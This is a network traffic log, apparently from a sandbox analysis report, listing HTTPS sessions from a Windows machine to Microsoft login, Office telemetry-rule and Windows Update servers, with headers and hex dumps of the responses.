                                                                                                                                                      2024-12-04 12:58:59 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                      2024-12-04 12:58:59 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                      Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      23192.168.2.44978740.126.53.17443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:00 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                      Accept: */*
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                      Content-Length: 3592
                                                                                                                                                      Host: login.live.com
                                                                                                                                                      2024-12-04 12:59:00 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                      2024-12-04 12:59:01 UTC568INHTTP/1.1 200 OK
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                      Expires: Wed, 04 Dec 2024 12:58:01 GMT
                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                      x-ms-route-info: C533_BL2
                                                                                                                                                      x-ms-request-id: de887759-fb8e-4299-b4eb-7ea1141540fc
                                                                                                                                                      PPServer: PPV: 30 H: BL02EPF0001D92E V: 0
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:00 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 1276
                                                                                                                                                      2024-12-04 12:59:01 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      24192.168.2.44979113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:01 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:01 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 2980
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                      x-ms-request-id: 40031d31-601e-005c-53c5-45f06f000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125901Z-1746fd949bd4w8sthC1EWR700400000000yg000000008bx4
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:01 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      25192.168.2.44979013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:01 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:01 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 2160
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                                      x-ms-request-id: 115d5b31-c01e-0046-4bcb-452db9000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125901Z-1746fd949bd6zq92hC1EWRry48000000014000000000ac5w
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:01 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      26192.168.2.44979213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:01 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:01 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 408
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                      x-ms-request-id: 9ac3d201-201e-0000-03c5-45a537000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125901Z-1746fd949bdkw94lhC1EWRxuz400000001fg000000001r5m
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:01 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      27192.168.2.44978913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:01 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:01 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 3788
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                                      x-ms-request-id: 667c147a-501e-0016-34cc-45181b000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125901Z-1746fd949bd6ztf6hC1EWRvq2s00000000vg000000007ycp
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:01 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      28192.168.2.44978813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:01 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:01 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 450
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                                      x-ms-request-id: c4831996-901e-0016-39ce-45efe9000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125901Z-1746fd949bdtlp5chC1EWRq1v4000000019g000000000h2t
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:01 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      29192.168.2.44979320.12.23.50443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:01 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=R361f7MVTHdTCvt&MD=TCE+BRaf HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept: */*
                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                      2024-12-04 12:59:02 UTC560INHTTP/1.1 200 OK
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Expires: -1
                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                      MS-CorrelationId: 1f0e15bb-0a66-458e-b4e0-da4780652600
                                                                                                                                                      MS-RequestId: 7b830763-3ba5-4a38-aeee-948c898ec856
                                                                                                                                                      MS-CV: TYh98T6b90SaqbPw.0
                                                                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:01 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 30005
                                                                                                                                                      2024-12-04 12:59:02 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                      2024-12-04 12:59:02 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      30192.168.2.44979513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:03 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:03 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 474
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                                      x-ms-request-id: 4628c04c-d01e-0017-18cc-45b035000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125903Z-1746fd949bdw2rg8hC1EWR11u400000001cg00000000bn1p
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
